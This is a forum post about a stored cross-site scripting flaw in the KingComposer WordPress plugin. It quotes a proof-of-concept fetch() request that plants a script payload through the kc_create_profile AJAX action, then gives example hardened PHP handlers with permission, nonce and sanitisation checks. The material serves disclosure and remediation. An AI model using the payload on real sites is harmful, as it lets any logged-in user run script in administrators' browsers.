KingComposer <= 2.9.6 – Subscriber+ Stored Cross-Site Scripting
Hello,
Does anyone know how to fix this bug?
Description:
The plugin does not have authorisation, CSRF and sanitisation/escaping checks when creating a profile, allowing any authenticated user to create arbitrary ones with Cross-Site Scripting payloads in them.
Proof of Concept
Create profile:
fetch("https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"name": "y", "slug": "y", "data": btoa("<script>alert(1);</script>")}),
  "method": "POST",
  "credentials": "include"
});
The XSS will be triggered at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y
Thanks in advance
lalmeida
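A hardened version of the two AJAX handlers the report describes, written here as an added example and not KingComposer's own code. It assumes hypothetical function names (kc_example_create_profile, kc_example_download_profile), a hypothetical option name (kc_profiles_example) and that the client sends a nonce created with wp_create_nonce('kc_create_profile'); it adds the missing capability check, nonce check, input sanitisation and a non-HTML download response.

```php
<?php
// Hypothetical hardened handlers (example only, not the plugin's code).
// Assumes profiles are stored in the option 'kc_profiles_example' keyed by slug
// and the client sends a nonce made with wp_create_nonce( 'kc_create_profile' ).
add_action( 'wp_ajax_kc_create_profile', 'kc_example_create_profile' );
function kc_example_create_profile() {
    // 1. Authorisation: subscribers must not be able to create profiles.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }
    // 2. CSRF: the request must carry a valid nonce for this action.
    check_ajax_referer( 'kc_create_profile', 'nonce' );
    // 3. Sanitisation: constrain every field to the shape we expect.
    $name = sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) );
    $slug = sanitize_title( wp_unslash( $_POST['slug'] ?? '' ) );
    $raw  = base64_decode( (string) ( $_POST['data'] ?? '' ), true ); // strict: rejects junk
    $data = ( false === $raw ) ? null : json_decode( $raw, true );
    if ( '' === $name || '' === $slug || ! is_array( $data ) ) {
        wp_send_json_error( 'invalid profile payload', 400 );
    }
    $profiles          = get_option( 'kc_profiles_example', array() );
    $profiles[ $slug ] = array( 'name' => $name, 'data' => $data );
    update_option( 'kc_profiles_example', $profiles );
    wp_send_json_success( array( 'slug' => $slug ) );
}

add_action( 'wp_ajax_kc_download_profile', 'kc_example_download_profile' );
function kc_example_download_profile() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'insufficient permissions', '', array( 'response' => 403 ) );
    }
    $slug     = sanitize_title( wp_unslash( $_GET['name'] ?? '' ) );
    $profiles = get_option( 'kc_profiles_example', array() );
    if ( ! isset( $profiles[ $slug ] ) ) {
        wp_die( 'unknown profile', '', array( 'response' => 404 ) );
    }
    // 4. Output: serve as a JSON attachment, never as HTML, so anything stored
    //    in the profile is downloaded rather than rendered by the browser.
    nocache_headers();
    header( 'Content-Type: application/json; charset=utf-8' );
    header( 'X-Content-Type-Options: nosniff' );
    header( 'Content-Disposition: attachment; filename="' . $slug . '.json"' );
    echo wp_json_encode( $profiles[ $slug ] );
    exit;
}
```

Any admin page that later renders a profile name or data must still pass it through esc_html() or esc_attr() at output time; the download handler above is safe only because it never emits HTML.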